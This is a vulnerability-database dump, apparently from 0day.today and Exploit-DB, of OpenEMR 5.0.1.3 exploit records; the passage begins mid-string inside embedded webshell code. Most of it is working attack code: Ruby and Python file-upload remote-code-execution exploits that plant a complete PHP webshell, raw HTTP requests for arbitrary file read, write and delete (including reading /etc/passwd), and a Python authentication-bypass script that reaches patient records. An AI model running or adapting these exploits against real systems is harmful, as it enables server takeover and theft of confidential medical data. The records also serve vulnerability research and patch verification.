{\\n CWD = cwd;\\n _updatePrompt();\\n return;\\n }\\n makeRequest(\\\"?feature=pwd\\\", {}, function(response) {\\n CWD = response.cwd;\\n _updatePrompt();\\n });\\n\\n }\\n\\n function escapeHtml(string) {\\n return string\\n .replace(/&/g, \\\"&\\\")\\n .replace(/</g, \\\"<\\\")\\n .replace(/>/g, \\\">\\\");\\n }\\n\\n function _updatePrompt() {\\n var eShellPrompt = document.getElementById(\\\"shell-prompt\\\");\\n eShellPrompt.innerHTML = genPrompt(CWD);\\n }\\n\\n function _onShellCmdKeyDown(event) {\\n switch (event.key) {\\n case \\\"Enter\\\":\\n featureShell(eShellCmdInput.value);\\n insertToHistory(eShellCmdInput.value);\\n eShellCmdInput.value = \\\"\\\";\\n break;\\n case \\\"ArrowUp\\\":\\n if (historyPosition > 0) {\\n historyPosition--;\\n eShellCmdInput.blur();\\n eShellCmdInput.value = commandHistory[historyPosition];\\n _defer(function() {\\n eShellCmdInput.focus();\\n });\\n }\\n break;\\n case \\\"ArrowDown\\\":\\n if (historyPosition >= commandHistory.length) {\\n break;\\n }\\n historyPosition++;\\n if (historyPosition === commandHistory.length) {\\n eShellCmdInput.value = \\\"\\\";\\n } else {\\n eShellCmdInput.blur();\\n eShellCmdInput.focus();\\n eShellCmdInput.value = commandHistory[historyPosition];\\n }\\n break;\\n case 'Tab':\\n event.preventDefault();\\n featureHint();\\n break;\\n }\\n }\\n\\n function insertToHistory(cmd) {\\n commandHistory.push(cmd);\\n historyPosition = commandHistory.length;\\n }\\n\\n function makeRequest(url, params, callback) {\\n function getQueryString() {\\n var a = [];\\n for (var key in params) {\\n if (params.hasOwnProperty(key)) {\\n a.push(encodeURIComponent(key) + \\\"=\\\" + encodeURIComponent(params[key]));\\n }\\n }\\n return a.join(\\\"&\\\");\\n }\\n var xhr = new XMLHttpRequest();\\n xhr.open(\\\"POST\\\", url, true);\\n xhr.setRequestHeader(\\\"Content-Type\\\", \\\"application/x-www-form-urlencoded\\\");\\n xhr.onreadystatechange = function() {\\n if (xhr.readyState === 4 && xhr.status === 
200) {\\n try {\\n var responseJson = JSON.parse(xhr.responseText);\\n callback(responseJson);\\n } catch (error) {\\n alert(\\\"Error while parsing response: \\\" + error);\\n }\\n }\\n };\\n xhr.send(getQueryString());\\n }\\n\\n document.onclick = function(event) {\\n event = event || window.event;\\n var selection = window.getSelection();\\n var target = event.target || event.srcElement;\\n\\n if (target.tagName === \\\"SELECT\\\") {\\n return;\\n }\\n\\n if (!selection.toString()) {\\n eShellCmdInput.focus();\\n }\\n };\\n\\n window.onload = function() {\\n eShellCmdInput = document.getElementById(\\\"shell-cmd\\\");\\n eShellContent = document.getElementById(\\\"shell-content\\\");\\n updateCwd();\\n eShellCmdInput.focus();\\n };\\n </script>\\n </head>\\n\\n <body>\\n <div id=\\\"shell\\\">\\n <pre id=\\\"shell-content\\\">\\n <div id=\\\"shell-logo\\\">\\n ___ ____ _ _ _ _ _ <span></span>\\n _ __ / _ \\\\__ ___ __ _ _ / __ \\\\ ___| |__ ___| | |_ /\\\\/|| || |_ <span></span>\\n| '_ \\\\| | | \\\\ \\\\ /\\\\ / / '_ \\\\| | | |/ / _` / __| '_ \\\\ / _ \\\\ | (_)/\\\\/_ .. 
_|<span></span>\\n| |_) | |_| |\\\\ V V /| | | | |_| | | (_| \\\\__ \\\\ | | | __/ | |_ |_ _|<span></span>\\n| .__/ \\\\___/ \\\\_/\\\\_/ |_| |_|\\\\__, |\\\\ \\\\__,_|___/_| |_|\\\\___|_|_(_) |_||_| <span></span>\\n|_| |___/ \\\\____/ <span></span>\\n </div>\\n </pre>\\n <div id=\\\"shell-input\\\">\\n <label for=\\\"shell-cmd\\\" id=\\\"shell-prompt\\\" class=\\\"shell-prompt\\\">???</label>\\n <div>\\n <input id=\\\"shell-cmd\\\" name=\\\"cmd\\\" onkeydown=\\\"_onShellCmdKeyDown(event)\\\"/>\\n </div>\\n </div>\\n </div>\\n </body>\\n\\n</html>\\n\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"form_dest_filename\\\"\\r\\n\\r\\n\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"form_education\\\"; filename=\\\"\\\"\\r\\nContent-Type: application/octet-stream\\r\\n\\r\\n\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"bn_save\\\"\\r\\n\\r\\nSave\\r\\n-----------------------------31900464228840324774249185339--\\r\\n\"\n\n# Send Exploit:\nsession.post(exploit_url, headers=header, data=body)\n\n# Finish\npath = 'http://' + target_ip + ':' + target_port + openemr_path + '/sites/default/images/shell.php'\nprint('[+] Webshell: ' + path)\n", "sourceHref": "https://0day.today/exploit/36407", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-12-20T11:35:52", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-13T00:00:00", "type": "zdt", "title": "OpenEMR 
5.0.1.3 - (manage_site_files) Remote Code Execution (Authenticated) Exploit (2)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15139", "CVE-2019-14530"], "modified": "2021-07-13T00:00:00", "id": "1337DAY-ID-36549", "href": "https://0day.today/exploit/description/36549", "sourceData": "# Title: OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2)\n# Exploit author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr)\n# Vendor Homepage: https://www.open-emr.org/\n# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz\n# Docker PoC: https://github.com/sec-it/exploit-CVE-2018-15139/blob/master/docker-compose.yml\n# Version: < 5.0.1.4 (it means up to 5.0.1.3)\n# Tested on: OpenEMR Version 5.0.0.8\n# References: https://www.exploit-db.com/exploits/49998\n# CVE: CVE-2018-15139\n# CWE: CWE-434\n# Patch: https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485\n\n#!/usr/bin/env ruby\n\nrequire 'pathname'\nrequire 'httpx'\nrequire 'http/form_data'\nrequire 'docopt'\n\ndoc = <<~DOCOPT\n OpenEMR < 5.0.1.4 - (Authenticated) File upload - Remote command execution\n\n Source: https://github.com/sec-it/exploit-CVE-2019-14530\n\n Usage:\n #{__FILE__} exploit <url> <filename> <username> <password> [--debug]\n #{__FILE__} -h | --help\n\n Options:\n <url> Root URL (base path) including HTTP scheme, port and root folder\n <filename> Filename of the shell to be uploaded\n <username> Username of the admin\n <password> Password 
of the admin\n --debug Display arguments\n -h, --help Show this screen\n\n Examples:\n #{__FILE__} exploit http://example.org/openemr shell.php admin pass\n #{__FILE__} exploit https://example.org:5000/ shell.php admin pass\nDOCOPT\n\ndef login(root_url, user, pass, http)\n vuln_url = \"#{root_url}/interface/main/main_screen.php?auth=login&site=default\"\n params = {\n 'new_login_session_management' => '1',\n 'authProvider' => 'Default',\n 'authUser' => user,\n 'clearPass' => pass,\n 'languageChoice' => '1'\n }\n\n http.post(vuln_url, form: params).body.to_s\nend\n\ndef upload(root_url, filepath, http)\n vuln_url = \"#{root_url}/interface/super/manage_site_files.php\"\n pn = Pathname.new(filepath)\n\n params = {\n form_image: {\n content_type: 'application/x-php',\n filename: pn.basename.to_s,\n body: pn\n },\n bn_save: 'Save'\n }\n\n res = http.post(vuln_url, form: params)\n\n return '[-] File not upload' unless (200..299).include?(res.status)\n\n \"[+] File uploaded:\\n#{root_url}/sites/default/images/#{pn.basename}\"\nend\n\nbegin\n args = Docopt.docopt(doc)\n pp args if args['--debug']\n\n if args['exploit']\n http = HTTPX.plugin(:cookies).plugin(:follow_redirects).plugin(:multipart)\n login(args['<url>'], args['<username>'], args['<password>'], http)\n puts upload(args['<url>'], args['<filename>'], http)\n end\nrescue Docopt::Exit => e\n puts e.message\nend\n", "sourceHref": "https://0day.today/exploit/36549", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2023-06-07T15:30:09", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, 
"published": "2018-08-16T00:00:00", "type": "exploitdb", "title": "OpenEMR 5.0.1.3 - (Authenticated) Arbitrary File Actions", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["2018-15140", "2018-15141", "2018-15142", "CVE-2018-15140", "CVE-2018-15141", "CVE-2018-15142"], "modified": "2018-08-16T00:00:00", "id": "EDB-ID:45202", "href": "https://www.exploit-db.com/exploits/45202", "sourceData": "# Exploit Title: OpenEMR 5.0.1.3 - Arbitrary File Actions\n# Date: 2018-08-14\n# Exploit Author: Joshua Fam\n# Twitter : @Insecurity\n# Vendor Homepage: https://www.open-emr.org/\n# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz\n# Version: < 5.0.1.3\n# Tested on: Ubuntu LAMP, OpenEMR Version 5.0.1.3\n# CVE : CVE-2018-15142,CVE-2018-15141,CVE-2018-15140\n\n# 1.Arbitrary File Read:\n# In OpenEmr a user that has access to the portal can send a malcious\n# POST request to read arbitrary files.\n\n# i.Vulnerable Code:\n# if ($_POST['mode'] == 'get') {\n# echo file_get_contents($_POST['docid']);\n# exit;\n# }\n\n# ii. 
Proof of Concept:\nPOST /openemr/portal/import_template.php HTTP/1.1\nHost: hostname\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 26\n\nmode=get&docid=/etc/passwd\n\n# 2.Arbitrary File Write:\n# In OpenEmr a user that has access to the portal can send a malcious\n# POST request to write arbitrary files.\n\n# i. Vulnerable Code:\n# } else if ($_POST['mode'] == 'save') {\n# file_put_contents($_POST['docid'], $_POST['content']);\n# exit(true);\n# }\n\n# ii. Proof of Concept:\nPOST /openemr/portal/import_template.php HTTP/1.1\nHost: hostname\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 54\n\nmode=save&docid=payload.php&content=<?php phpinfo();?>\n\n# After sending this navigate to payload.php at http://hostname/openemr/portal\n\n# 3. Arbitrary File Delete:\n# In OpenEmr a user that has access to the portal can send a malcious\n# POST request to delete a arbitrary file.\n\n# i. Vulnerable Code:\n# } else if ($_POST['mode'] == 'delete') {\n# unlink($_POST['docid']);\n# exit(true);\n# }\n\n# ii. 
Proof of Concept:\nPOST /openemr/portal/import_template.php HTTP/1.1\nHost: 127.0.0.1\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 29\n\nmode=delete&docid=payload.php\n\n# After completing this request, when you navigate to payload.php, you should be greeted by a 404 page.", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/linux/webapps/45202.txt", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-07T15:19:43", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-06-16T00:00:00", "type": "exploitdb", "title": "OpenEMR 5.0.1.3 - Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["2018-15152", "CVE-2018-15152"], "modified": "2021-06-16T00:00:00", "id": 
"EDB-ID:50017", "href": "https://www.exploit-db.com/exploits/50017", "sourceData": "# Exploit Title: OpenEMR 5.0.1.3 - '/portal/account/register.php' Authentication Bypass\n# Date 15.06.2021\n# Exploit Author: Ron Jost (Hacker5preme)\n# Vendor Homepage: https://www.open-emr.org/\n# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_3.zip\n# Version: All versions prior to 5.0.1.4\n# Tested on: Ubuntu 18.04\n# CVE: CVE-2018-15152\n# CWE: CWE-287\n# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-15152-Exploit\n\n'''\nDescription:\nAn unauthenticated user is able to bypass the Patient Portal Login by simply navigating to\nthe registration page and modifying the requested url to access the desired page. Some\nexamples of pages in the portal directory that are accessible after browsing to the\nregistration page include:\n- add_edit_event_user.php\n- find_appt_popup_user.php\n- get_allergies.php\n- get_amendments.php\n- get_lab_results.php\n- get_medications.php\n- get_patient_documents.php\n- get_problems.php\n- get_profile.php\n- portal_payment.php\n- messaging/messages.php\n- messaging/secure_chat.php\n- report/pat_ledger.php\n- report/portal_custom_report.php\n- report/portal_patient_report.php\nNormally, access to these pages requires authentication as a patient. 
If a user were to visit\nany of those pages unauthenticated, they would be redirected to the login page.\n'''\n\n\n'''\nImport required modules:\n'''\nimport requests\nimport argparse\n\n\n'''\nUser-Input:\n'''\nmy_parser = argparse.ArgumentParser(description='OpenEMR Authentication bypass')\nmy_parser.add_argument('-T', '--IP', type=str)\nmy_parser.add_argument('-P', '--PORT', type=str)\nmy_parser.add_argument('-U', '--Openemrpath', type=str)\nmy_parser.add_argument('-R', '--PathToGet', type=str)\nargs = my_parser.parse_args()\ntarget_ip = args.IP\ntarget_port = args.PORT\nopenemr_path = args.Openemrpath\npathtoread = args.PathToGet\n\n\n'''\nCheck for vulnerability:\n'''\n# Check, if Registration portal is enabled. If it is not, this exploit can not work\nsession = requests.Session()\ncheck_vuln_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/portal/account/register.php'\ncheck_vuln = session.get(check_vuln_url).text\nprint('')\nprint('[*] Checking vulnerability: ')\nprint('')\n\nif \"Enter email address to receive registration.\" in check_vuln:\n print('[+] Host Vulnerable. 
Proceeding exploit')\nelse:\n print('[-] Host is not Vulnerable: Registration for patients is not enabled')\n\n'''\nExploit:\n'''\nheader = {\n 'Referer': check_vuln_url\n}\nexploit_url = 'http://' + target_ip + ':' + target_port + openemr_path + pathtoread\nExploit = session.get(exploit_url, headers=header)\nprint('')\nprint('[+] Results: ')\nprint('')\nprint(Exploit.text)\nprint('')", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/php/webapps/50017.py", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-06-07T15:19:47", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-14T00:00:00", "type": "exploitdb", "title": "OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["2018-15139", "CVE-2018-15139"], "modified": "2021-06-14T00:00:00", "id": "EDB-ID:49998", "href": "https://www.exploit-db.com/exploits/49998", "sourceData": "# Exploit Title: OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated)\n# Date 12.06.2021\n# Exploit Author: Ron Jost 
(Hacker5preme)\n# Vendor Homepage: https://www.open-emr.org/\n# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_3.zip\n# Version: Prior to 5.0.1.4\n# Tested on: Ubuntu 18.04\n# CVE: CVE-2018-15139\n# CWE: CWE-434\n# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-15139\n\n'''\nDescription:\nUnrestricted file upload in interface/super/manage_site_files.php in versions of OpenEMR before 5.0.1.4 allows a remote\nauthenticated attacker to execute arbitrary PHP code by uploading a file with a PHP extension via the images upload\nform and accessing it in the images directory.\n'''\n\n\n'''\nBanner:\n'''\nbanner =\"\"\"\n ___ _____ __ __ ____ ____ ___ _ _____\n / _ \\ _ __ ___ _ __ | ____| \\/ | _ \\ | ___| / _ \\ / | |___ /\n | | | | '_ \\ / _ \\ '_ \\| _| | |\\/| | |_) | _____ |___ \\| | | || | |_ \\\n | |_| | |_) | __/ | | | |___| | | | _ < |_____| ___) | |_| || |_ ___) |\n \\___/| .__/ \\___|_| |_|_____|_| |_|_| \\_\\ |____(_)___(_)_(_)____/\n |_|\n\n _____ _ _ _\n | ____|_ ___ __ | | ___ (_) |_\n | _| \\ \\/ / '_ \\| |/ _ \\| | __|\n | |___ > <| |_) | | (_) | | |_\n |_____/_/\\_\\ .__/|_|\\___/|_|\\__|\n |_|\n\n\"\"\"\nprint(banner)\n\n\n'''\nImport required modules\n'''\nimport argparse\nimport requests\n\n\n'''\nUser-Input:\n'''\nmy_parser = argparse.ArgumentParser(description='OpenEMR Remote Code Execution')\nmy_parser.add_argument('-T', '--IP', type=str)\nmy_parser.add_argument('-P', '--PORT', type=str)\nmy_parser.add_argument('-U', '--PATH', type=str)\nmy_parser.add_argument('-u', '--USERNAME', type=str)\nmy_parser.add_argument('-p', '--PASSWORD', type=str)\nargs = my_parser.parse_args()\ntarget_ip = args.IP\ntarget_port = args.PORT\nopenemr_path = args.PATH\nusername = args.USERNAME\npassword = args.PASSWORD\n\n'''\nAuthentication:\n'''\n# Preparation:\nsession = requests.Session()\nauth_url = 'http://' + target_ip + ':' + target_port + openemr_path + 
'/interface/main/main_screen.php?auth=login&site=default'\nauth_chek_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/login/login.php?site=default'\nresponse = session.get(auth_chek_url)\n\n# Header (auth):\nheader = {\n 'Host': target_ip,\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',\n 'Accept-Encoding': 'gzip, deflate',\n 'Content-Type': 'application/x-www-form-urlencoded',\n 'Origin': 'http://' + target_ip,\n 'Connection': 'close',\n 'Referer': auth_chek_url,\n 'Upgrade-Insecure-Requests': '1',\n}\n\n# Body (auth):\nbody = {\n 'new_login_session_management': '1',\n 'authProvider': 'Default',\n 'authUser': username,\n 'clearPass': password,\n 'languageChoice': '1'\n}\n\n# Authentication:\nprint('')\nprint('[+] Authentication')\nauth = session.post(auth_url,headers=header, data=body)\n\n\n'''\nExploit:\n'''\nprint('')\nprint('[+] Uploading Webshell:')\n\n# URL:\nexploit_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/super/manage_site_files.php'\n\n# Headers (Exploit):\nheader = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\",\n \"Accept-Language\": \"de,en-US;q=0.7,en;q=0.3\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Content-Type\": \"multipart/form-data; boundary=---------------------------31900464228840324774249185339\",\n \"Origin\": \"http://\" + target_ip,\n \"Connection\": \"close\",\n \"Referer\": 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/super/manage_site_files.php',\n \"Upgrade-Insecure-Requests\": \"1\"\n}\n\n# Body (Exploit):\nbody = \"-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; 
name=\\\"form_filename\\\"\\r\\n\\r\\n\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"form_filedata\\\"\\r\\n\\r\\n\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"MAX_FILE_SIZE\\\"\\r\\n\\r\\n12000000\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"form_image\\\"; filename=\\\"shell.php\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n<?php\\n\\nfunction featureShell($cmd, $cwd) {\\n $stdout = array();\\n\\n if (preg_match(\\\"/^\\\\s*cd\\\\s*$/\\\", $cmd)) {\\n // pass\\n } elseif (preg_match(\\\"/^\\\\s*cd\\\\s+(.+)\\\\s*(2>&1)?$/\\\", $cmd)) {\\n chdir($cwd);\\n preg_match(\\\"/^\\\\s*cd\\\\s+([^\\\\s]+)\\\\s*(2>&1)?$/\\\", $cmd, $match);\\n chdir($match[1]);\\n } elseif (preg_match(\\\"/^\\\\s*download\\\\s+[^\\\\s]+\\\\s*(2>&1)?$/\\\", $cmd)) {\\n chdir($cwd);\\n preg_match(\\\"/^\\\\s*download\\\\s+([^\\\\s]+)\\\\s*(2>&1)?$/\\\", $cmd, $match);\\n return featureDownload($match[1]);\\n } else {\\n chdir($cwd);\\n exec($cmd, $stdout);\\n }\\n\\n return array(\\n \\\"stdout\\\" => $stdout,\\n \\\"cwd\\\" => getcwd()\\n );\\n}\\n\\nfunction featurePwd() {\\n return array(\\\"cwd\\\" => getcwd());\\n}\\n\\nfunction featureHint($fileName, $cwd, $type) {\\n chdir($cwd);\\n if ($type == 'cmd') {\\n $cmd = \\\"compgen -c $fileName\\\";\\n } else {\\n $cmd = \\\"compgen -f $fileName\\\";\\n }\\n $cmd = \\\"/bin/bash -c \\\\\\\"$cmd\\\\\\\"\\\";\\n $files = explode(\\\"\\\\n\\\", shell_exec($cmd));\\n return array(\\n 'files' => $files,\\n );\\n}\\n\\nfunction featureDownload($filePath) {\\n $file = @file_get_contents($filePath);\\n if ($file === FALSE) {\\n return array(\\n 'stdout' => array('File not found / no read permission.'),\\n 'cwd' => getcwd()\\n );\\n } else {\\n return array(\\n 'name' => basename($filePath),\\n 'file' => base64_encode($file)\\n );\\n }\\n}\\n\\nfunction 
featureUpload($path, $file, $cwd) {\\n chdir($cwd);\\n $f = @fopen($path, 'wb');\\n if ($f === FALSE) {\\n return array(\\n 'stdout' => array('Invalid path / no write permission.'),\\n 'cwd' => getcwd()\\n );\\n } else {\\n fwrite($f, base64_decode($file));\\n fclose($f);\\n return array(\\n 'stdout' => array('Done.'),\\n 'cwd' => getcwd()\\n );\\n }\\n}\\n\\nif (isset($_GET[\\\"feature\\\"])) {\\n\\n $response = NULL;\\n\\n switch ($_GET[\\\"feature\\\"]) {\\n case \\\"shell\\\":\\n $cmd = $_POST['cmd'];\\n if (!preg_match('/2>/', $cmd)) {\\n $cmd .= ' 2>&1';\\n }\\n $response = featureShell($cmd, $_POST[\\\"cwd\\\"]);\\n break;\\n case \\\"pwd\\\":\\n $response = featurePwd();\\n break;\\n case \\\"hint\\\":\\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\\n break;\\n case 'upload':\\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\\n }\\n\\n header(\\\"Content-Type: application/json\\\");\\n echo json_encode($response);\\n die();\\n}\\n\\n?><!DOCTYPE html>\\n\\n<html>\\n\\n <head>\\n <meta charset=\\\"UTF-8\\\" />\\n <title>p0wny@shell:~#</title>\\n <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\" />\\n <style>\\n html, body {\\n margin: 0;\\n padding: 0;\\n background: #333;\\n color: #eee;\\n font-family: monospace;\\n }\\n\\n *::-webkit-scrollbar-track {\\n border-radius: 8px;\\n background-color: #353535;\\n }\\n\\n *::-webkit-scrollbar {\\n width: 8px;\\n height: 8px;\\n }\\n\\n *::-webkit-scrollbar-thumb {\\n border-radius: 8px;\\n -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\\n background-color: #bcbcbc;\\n }\\n\\n #shell {\\n background: #222;\\n max-width: 800px;\\n margin: 50px auto 0 auto;\\n box-shadow: 0 0 5px rgba(0, 0, 0, .3);\\n font-size: 10pt;\\n display: flex;\\n flex-direction: column;\\n align-items: stretch;\\n }\\n\\n #shell-content {\\n height: 500px;\\n overflow: auto;\\n padding: 5px;\\n white-space: pre-wrap;\\n flex-grow: 1;\\n }\\n\\n 
#shell-logo {\\n font-weight: bold;\\n color: #FF4180;\\n text-align: center;\\n }\\n\\n @media (max-width: 991px) {\\n #shell-logo {\\n font-size: 6px;\\n margin: -25px 0;\\n }\\n\\n html, body, #shell {\\n height: 100%;\\n width: 100%;\\n max-width: none;\\n }\\n\\n #shell {\\n margin-top: 0;\\n }\\n }\\n\\n @media (max-width: 767px) {\\n #shell-input {\\n flex-direction: column;\\n }\\n }\\n\\n @media (max-width: 320px) {\\n #shell-logo {\\n font-size: 5px;\\n }\\n }\\n\\n .shell-prompt {\\n font-weight: bold;\\n color: #75DF0B;\\n }\\n\\n .shell-prompt > span {\\n color: #1BC9E7;\\n }\\n\\n #shell-input {\\n display: flex;\\n box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);\\n border-top: rgba(255, 255, 255, .05) solid 1px;\\n }\\n\\n #shell-input > label {\\n flex-grow: 0;\\n display: block;\\n padding: 0 5px;\\n height: 30px;\\n line-height: 30px;\\n }\\n\\n #shell-input #shell-cmd {\\n height: 30px;\\n line-height: 30px;\\n border: none;\\n background: transparent;\\n color: #eee;\\n font-family: monospace;\\n font-size: 10pt;\\n width: 100%;\\n align-self: center;\\n }\\n\\n #shell-input div {\\n flex-grow: 1;\\n align-items: stretch;\\n }\\n\\n #shell-input input {\\n outline: none;\\n }\\n </style>\\n\\n <script>\\n var CWD = null;\\n var commandHistory = [];\\n var historyPosition = 0;\\n var eShellCmdInput = null;\\n var eShellContent = null;\\n\\n function _insertCommand(command) {\\n 